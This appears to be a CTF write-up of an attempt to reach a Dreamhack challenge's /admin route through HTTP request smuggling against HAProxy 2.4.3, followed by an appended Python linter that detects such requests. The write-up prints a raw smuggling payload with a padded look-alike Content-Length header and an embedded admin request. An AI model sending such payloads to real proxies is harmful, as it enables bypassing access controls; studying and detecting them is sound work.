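1. Code review

- A request to /admin is handled by /routes/admin.js
- A request to /flag is handled by /routes/flag.js

- getBalance() > 10: must be 10 or more

- Need to try adding balance through charge

- Confirmed from the docker-compose.yml file (haproxy: 2.4.3)
2. HRS attack: the goal is to reach /charge and /admin through HTTP request smuggling (HRS)

- I had thought that for auth, calling /admin would be enough
1) Ran smuggler-master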
https://github.com/defparam/smuggler
python3 smuggler.py -u <URL>
- No TE-CL or CL-TE HRS vulnerabilities were found
2) All attempts against the vulnerabilities related to this HAProxy version failed
2023-25725 : X
2023-25950 : X
2021-40346 : X
2023-40225 : X
2021-39242 : X
2021-39241 : X
2021-39240 : X
POST / HTTP/1.1
Host: host3.dreamhack.games:23442
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: jwt=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiZ3Vlc3QiLCJpYXQiOjE3MDY5NDgyODF9.X6nL5kDEFYNcMKI5_ddig6RQXC2ogaRAkYbxDmcFt1byunwEHibInhF13CJd4mvrDIhYLKvAx-i1lkgX1Nyhb39X5Yx8EUcxBUf4wucQ6e1ps-MsQZF7FMy_bc4g3dp1y_RguCLx95F4mZo60rmO8DxGDkenctZq8i1mQk5UlpsASm7vhKgDZF2k8N-UiDaKTFBYzA5sUQuYFhnDYGwbHWHuRafSGhT0nX4stzykoH2RLz-S4TAHrcPCzQLvRrffBdqEfKDM_-Os5pvJlkpPYWKGniU7tc6GnvIbaGKt2J7aH8i3RN45wmUrJFOe-Oz-ewg2JjXXtuAznMzmsouxxw
If-None-Match: W/"1f-VY9YVxhwLs5YIwdLsP7GaziYuyk"
Connection: close
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 56
GET /admin
Host: host3.dreamhack.games:23442
abc : foo
GET /admin HTTP/1.1 / HTTP/1.1
Host: host3.dreamhack.games:23442
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
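
A defender-side check for the request shape shown above, as an added example that is not part of the original post: it lints one raw request head for the padded Content-Length look-alike header name, whitespace before the colon (as in `abc : foo`), and conflicting framing headers. The function name, the 64-byte name limit, the sample host and the padding length are assumptions.

```python
import re

TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")  # RFC 9110 field-name chars
MAX_NAME_LEN = 64  # assumed local policy limit, not a protocol constant

# Constructed sample shaped like the request above; host and padding are made up.
BODY = "GET /admin HTTP/1.1\r\nHost: example.test\r\nabc : foo\r\n\r\n"
SAMPLE = (
    "POST / HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Length0" + "a" * 255 + ":\r\n"
    "Content-Length: 56\r\n"
    "\r\n" + BODY
)

def lint_request_head(raw: str) -> list[str]:
    """Return request-smuggling indicators found in one request's header block."""
    head = raw.split("\r\n\r\n", 1)[0]
    findings, lengths, has_te = [], set(), False
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        key = name.strip().lower()
        if not sep:
            findings.append(f"header line without colon: {line[:30]!r}")
            continue
        if name != name.strip():
            findings.append(f"whitespace around field name: {name[:30]!r}")
        if not TOKEN.fullmatch(name.strip()):
            findings.append(f"illegal characters in field name: {name[:30]!r}")
        if len(key) > MAX_NAME_LEN:
            findings.append(f"oversized field name ({len(key)} bytes)")
        if key.startswith("content-length") and key != "content-length":
            findings.append("look-alike Content-Length field name")
        if key == "content-length":
            lengths.add(value.strip())
            if not re.fullmatch(r"[0-9]+", value.strip()):
                findings.append(f"non-numeric Content-Length: {value.strip()!r}")
        has_te = has_te or key == "transfer-encoding"
    if len(lengths) > 1:
        findings.append("conflicting Content-Length values")
    if lengths and has_te:
        findings.append("Content-Length together with Transfer-Encoding")
    return findings

if __name__ == "__main__":
    for label, req in (("outer", SAMPLE), ("embedded", BODY)):
        print(label, lint_request_head(req))
```

A proxy or backend that rejects any request with a non-empty findings list never has to decide which of two framings to trust.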